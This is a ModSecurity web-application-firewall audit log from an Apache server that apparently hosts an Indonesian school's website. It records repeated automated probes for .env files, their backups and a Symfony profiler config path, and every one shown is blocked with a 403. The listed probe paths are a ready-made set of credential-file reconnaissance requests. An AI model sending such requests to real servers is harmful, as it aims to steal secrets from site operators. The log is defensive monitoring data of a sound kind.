1745117751328318 803 (- - -) Stopwatch2: 1745117751328318 803; combined=340, p1=297, p2=0, p3=0, p4=0, p5=42, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2c4617f-Z-- --52443a5e-A-- [20/Apr/2025:10:49:37 +0700] aARu0cTCDeBrh52UaHQWbAAAAIE 103.236.140.4 59894 103.236.140.4 8181 --52443a5e-B-- GET /.env.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 103.59.160.222 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 103.59.160.222 Accept-Encoding: gzip X-Varnish: 130716468 --52443a5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52443a5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745120977827174 829 (- - -) Stopwatch2: 1745120977827174 829; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52443a5e-Z-- --47164614-A-- [20/Apr/2025:11:17:05 +0700] aAR1QUAzeWrUIk0gvAuF2wAAANY 103.236.140.4 44796 103.236.140.4 8181 --47164614-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.84.0.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.84.0.171 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --47164614-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47164614-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745122625880862 869 (- - -) Stopwatch2: 1745122625880862 869; combined=334, p1=294, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47164614-Z-- --4975402d-A-- [20/Apr/2025:11:17:08 +0700] aAR1RFu16wJWB6g0mU9YjwAAAAY 103.236.140.4 44870 103.236.140.4 8181 --4975402d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.84.0.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.84.0.171 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --4975402d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4975402d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745122628798734 775 (- - -) Stopwatch2: 1745122628798734 775; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4975402d-Z-- --402a6c28-A-- [20/Apr/2025:11:40:01 +0700] aAR6oVTf0pL9EQC7JDV8ugAAAFM 103.236.140.4 45696 103.236.140.4 8181 --402a6c28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --402a6c28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --402a6c28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745124001849252 701 (- - -) Stopwatch2: 1745124001849252 701; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --402a6c28-Z-- --3b7f7319-A-- [20/Apr/2025:11:40:25 +0700] aAR6uVu16wJWB6g0mU9lqwAAAAM 103.236.140.4 45792 103.236.140.4 8181 --3b7f7319-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --3b7f7319-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b7f7319-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745124025402584 748 (- - -) Stopwatch2: 1745124025402584 748; combined=301, p1=261, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b7f7319-Z-- --2061403f-A-- [20/Apr/2025:11:51:44 +0700] aAR9YFTf0pL9EQC7JDWEdQAAAEg 103.236.140.4 51058 103.236.140.4 8181 --2061403f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.252.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.252.208 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2061403f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2061403f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745124704606050 553 (- - -) Stopwatch2: 1745124704606050 553; combined=218, p1=189, p2=0, p3=0, p4=0, p5=29, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2061403f-Z-- --9468cd7a-A-- [20/Apr/2025:11:51:46 +0700] aAR9YsTCDeBrh52UaHQ8VwAAAIs 103.236.140.4 51134 103.236.140.4 8181 --9468cd7a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.252.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.252.208 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9468cd7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9468cd7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745124706012668 717 (- - -) Stopwatch2: 1745124706012668 717; combined=280, p1=237, p2=0, p3=0, p4=0, p5=43, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9468cd7a-Z-- --fb3b9855-A-- [20/Apr/2025:12:18:04 +0700] aASDjFu16wJWB6g0mU-EHQAAABQ 103.236.140.4 46094 103.236.140.4 8181 --fb3b9855-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.189.2.13 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.189.2.13 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --fb3b9855-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb3b9855-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745126284788238 814 (- - -) Stopwatch2: 1745126284788238 814; combined=286, p1=250, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb3b9855-Z-- --10fa324c-A-- [20/Apr/2025:14:03:41 +0700] aAScTcTCDeBrh52UaHRfIQAAAJg 103.236.140.4 43732 103.236.140.4 8181 --10fa324c-B-- GET /.env.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.59.160.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.59.160.222 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --10fa324c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10fa324c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132621501183 821 (- - -) Stopwatch2: 1745132621501183 821; combined=338, p1=303, p2=0, p3=0, p4=0, p5=35, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10fa324c-Z-- --0a1c4943-A-- [20/Apr/2025:14:04:14 +0700] aAScblu16wJWB6g0mU-b5QAAAAA 103.236.140.4 43868 103.236.140.4 8181 --0a1c4943-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2 --0a1c4943-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a1c4943-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132654757702 872 (- - -) Stopwatch2: 1745132654757702 872; combined=343, p1=280, p2=0, p3=0, p4=0, p5=62, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a1c4943-Z-- --446f8163-A-- [20/Apr/2025:14:04:15 +0700] aAScb8TCDeBrh52UaHRfKQAAAJQ 103.236.140.4 43870 103.236.140.4 8181 --446f8163-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Moto E (4) Build/NCQ26.69-56) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 --446f8163-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --446f8163-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132655294642 792 (- - -) Stopwatch2: 1745132655294642 792; combined=293, p1=254, p2=0, p3=0, p4=0, p5=39, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --446f8163-Z-- --a97e522f-A-- [20/Apr/2025:14:04:18 +0700] aAScclTf0pL9EQC7JDWtbQAAAFc 103.236.140.4 43886 103.236.140.4 8181 --a97e522f-B-- GET /.env.example HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; N9510 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 --a97e522f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a97e522f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132658063138 836 (- - -) Stopwatch2: 1745132658063138 836; combined=340, p1=300, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a97e522f-Z-- --5711ad49-A-- [20/Apr/2025:14:04:20 +0700] aAScdEAzeWrUIk0gvAu-sAAAANA 103.236.140.4 43900 103.236.140.4 8181 --5711ad49-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-gb; SM-T310 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 --5711ad49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5711ad49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132660173736 847 (- - -) Stopwatch2: 1745132660173736 847; combined=362, p1=262, p2=0, p3=0, p4=0, p5=100, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5711ad49-Z-- --aa342c22-A-- [20/Apr/2025:14:04:22 +0700] aAScdlTf0pL9EQC7JDWtbgAAAEo 103.236.140.4 43910 103.236.140.4 8181 --aa342c22-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312 --aa342c22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa342c22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132662122923 851 (- - -) Stopwatch2: 1745132662122923 851; combined=288, p1=248, p2=0, p3=0, p4=0, p5=40, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa342c22-Z-- --1fffb631-A-- [20/Apr/2025:14:04:23 +0700] aAScd1u16wJWB6g0mU-b6AAAABY 103.236.140.4 43912 103.236.140.4 8181 --1fffb631-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.3; KFAPWI Build/KTU84M) AppleWebKit/537.36 (KHTML, like Gecko) Silk/44.1.81 like Chrome/44.0.2403.128 Safari/537.36 --1fffb631-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fffb631-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132663045783 777 (- - -) Stopwatch2: 1745132663045783 777; combined=312, p1=277, p2=0, p3=0, p4=0, p5=35, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fffb631-Z-- --7f09106a-A-- [20/Apr/2025:14:04:25 +0700] aASceUAzeWrUIk0gvAu-sQAAANU 103.236.140.4 43922 103.236.140.4 8181 --7f09106a-B-- GET /app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.52 (KHTML, like Gecko) Version/9.0 Safari/601.1.52 --7f09106a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f09106a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132665026221 803 (- - -) Stopwatch2: 1745132665026221 803; combined=311, p1=271, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f09106a-Z-- --2d70ff12-A-- [20/Apr/2025:14:04:25 +0700] aASceVu16wJWB6g0mU-b6gAAAAI 103.236.140.4 43928 103.236.140.4 8181 --2d70ff12-B-- GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-gb; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36 --2d70ff12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d70ff12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132665729081 855 (- - -) Stopwatch2: 1745132665729081 855; combined=336, p1=298, p2=0, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d70ff12-Z-- --001a6c43-A-- [20/Apr/2025:14:04:26 +0700] aAScelu16wJWB6g0mU-b7QAAABE 103.236.140.4 43936 103.236.140.4 8181 --001a6c43-B-- GET /backend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) --001a6c43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --001a6c43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745132666967294 783 (- - -) Stopwatch2: 1745132666967294 783; combined=322, p1=290, p2=0, p3=0, p4=0, p5=32, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --001a6c43-Z-- --b7d1654e-A-- [20/Apr/2025:14:04:27 +0700] aASce0AzeWrUIk0gvAu-sgAAAME 103.236.140.4 43942 103.236.140.4 8181 --b7d1654e-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1 --b7d1654e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7d1654e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 